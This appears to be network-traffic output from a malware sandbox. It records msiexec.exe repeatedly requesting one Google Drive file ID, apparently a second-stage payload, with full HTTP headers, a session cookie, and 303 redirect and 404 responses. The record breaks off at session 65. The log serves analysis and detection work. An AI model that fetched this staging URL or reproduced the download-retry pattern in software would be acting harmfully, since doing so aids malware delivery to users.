                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          57 | 192.168.2.6 | 50042 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:05 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:06 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC5FCXI5opmb7vreuxFh5xyKx3lNtjjX_22mBVQgoKyd_jWovCvJkdEXsbGgrv0xKbXTCcpN1cE
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:06 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-i4w3jNhc2k1eIcH4l2hNcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:06 UTC    1652    IN    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2ItaxeZALsO6fjJnawSpA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                          58            192.168.2.6    50043          142.250.185.110    443                 5692    C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          2025-01-10 14:18:07 UTC    418    OUT    GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:07 UTC    1920    IN    HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:07 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-wYY4cUOzFerBaMEpsVFquw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                                          59            192.168.2.6    50044          216.58.206.65     443                 5692    C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          2025-01-10 14:18:08 UTC    460    OUT    GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:08 UTC    1844    IN    HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQZx2ODWmxRhzrJpaQOPTijRxNsYLg7PrOuhxAx--7Ui2W9jwomxTi08ak3wLeqK0lI
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:08 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-_xSDV4TkkXLQrnhnv0Teow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:08 UTC    1652    IN    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zaTvsIQkWbv8SHZu1zUMBg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                          60            192.168.2.6    50046          142.250.185.110    443                 5692    C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          2025-01-10 14:18:09 UTC    418    OUT    GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:09 UTC    1920    IN    HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:09 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-TuRjmv5iUKSj5k0EQVGv7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                                          61            192.168.2.6    50047          216.58.206.65     443                 5692    C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          2025-01-10 14:18:10 UTC    460    OUT    GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:10 UTC    1844    IN    HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRKQI1gHZww9tOnRB3r-PrLvWT6oBYTMdnSMY8WS_nTKlFBwt9yenQV5uF333fMoj5U
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:10 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-JByc6npfKrjFrqPNkmGkgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:10 UTC    1652    IN    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HH-ViKaiH1NfadnNOZVQGg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                          62            192.168.2.6    50048          142.250.185.110    443                 5692    C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          2025-01-10 14:18:11 UTC    418    OUT    GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:12 UTC    1920    IN    HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:11 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-hdGb3ueDWb7gh_GqXW-FNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                                                                                          63            192.168.2.6    50049          216.58.206.65     443                 5692    C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          2025-01-10 14:18:12 UTC    460    OUT    GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:13 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC4nwiQg0mgxCb2_QNLYqvE1EorTlzaZVeV_WDT0vUNn2zb5wixMuhmGt6vO3-uMrlizZsl8wiw
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:13 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-97HF-wuI94U9lwlxYgQkCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:13 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XsoTe1unwJCA3wdiEZikyQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          64 | 192.168.2.6 | 50050 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:13 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:14 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:14 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-5bKzymMAU5E2np-jvSaElQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          65 | 192.168.2.6 | 50051 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:18:14 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:15 UTC | 1844 | IN | HTTP/1.1 404 Not Found
